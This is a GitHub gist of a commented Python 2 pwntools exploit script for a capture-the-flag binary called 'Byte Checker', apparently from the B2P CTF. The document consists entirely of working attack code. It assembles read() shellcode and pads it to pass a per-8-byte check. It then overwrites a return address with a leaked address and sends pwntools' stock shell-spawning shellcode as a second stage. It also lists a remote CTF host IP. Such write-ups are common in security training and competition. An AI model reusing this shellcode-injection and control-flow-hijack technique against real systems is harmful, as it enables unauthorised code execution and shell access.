@d4em0n
Last active April 30, 2018 14:35
Exploit CTF B2P Byte Checker
from pwn import *
import sys
# NOTE: press CTRL+D at the first interactive shell (the original note was in Indonesian).
# Python 2 / pwntools script: str values are raw byte strings throughout, and
# "/" is integer division -- see the notes below where that matters.
# Spawn the local target binary; the commented-out remote() line is the
# alternative endpoint the script was run against.
ch = process('./checker')
#ch = remote("35.197.134.203", 8031)
# Terminal pwntools uses for gdb.attach() (the attach call itself is disabled below).
context.terminal = ['tmux', 'splitw', '-h']
gdb_cmd = """
source /home/ramdhan/ctf/tools/peda/peda.py
b* 0x08048E50
"""
#gdb.attach(ch, gdb_cmd)
# First-stage payload, assembled by pwntools. No context.arch is set in this
# script, so asm() uses pwntools' default (i386). On 32-bit Linux, syscall
# number 3 via int 0x80 is read(); `mov al,3` writes only the low byte of eax,
# so the stage presumably relies on the rest of eax already being zero when it
# runs -- not verifiable from here. The trailing nops are padding.
shc = """
mov al,3
int 0x80
nop
nop
nop
"""
code = asm(shc)
print(len(code))
# Pad the assembled bytes to a fixed 144-byte buffer (NUL fill) and hold it as a
# list of single-char strings so individual positions can be patched below.
sh = list(code.ljust(144, "\x00"))
l = len(code)
# Integer division under Python 2. On Python 3 this would be a float and the
# chr() call in the loop would raise TypeError, so the script is not portable
# as written.
st = (l+1)/8
# Stamp an incrementing counter byte at every 8th position after the code.
# Presumably this satisfies a per-8-byte check in the target (the gist is
# titled "Byte Checker"); the checker's actual rule is not visible here.
for i in range(l, 144, 8):
    sh[i] = chr(st)
    st += 1
ch.recvuntil("= ")
# Parse the hex value the target prints after "= " and repack it as a
# 32-bit little-endian string (the variable name suggests a leaked address).
addr = p32(int(ch.recvline(), 16))
print(hex(u32(addr)))
# Overwrite bytes 136..139 of the buffer with that packed value.
l = 136
for i in range(4):
    sh[l+i] = addr[i]
sh = "".join(sh)
ch.send(sh)
# First interactive session -- this is where the CTRL+D note at the top applies;
# the next sendline() only runs once this session is closed.
ch.interactive()
# Second stage: 4 filler bytes followed by pwntools' stock shellcraft.sh() payload.
ch.sendline("AAAA" + asm(shellcraft.sh()))
ch.interactive()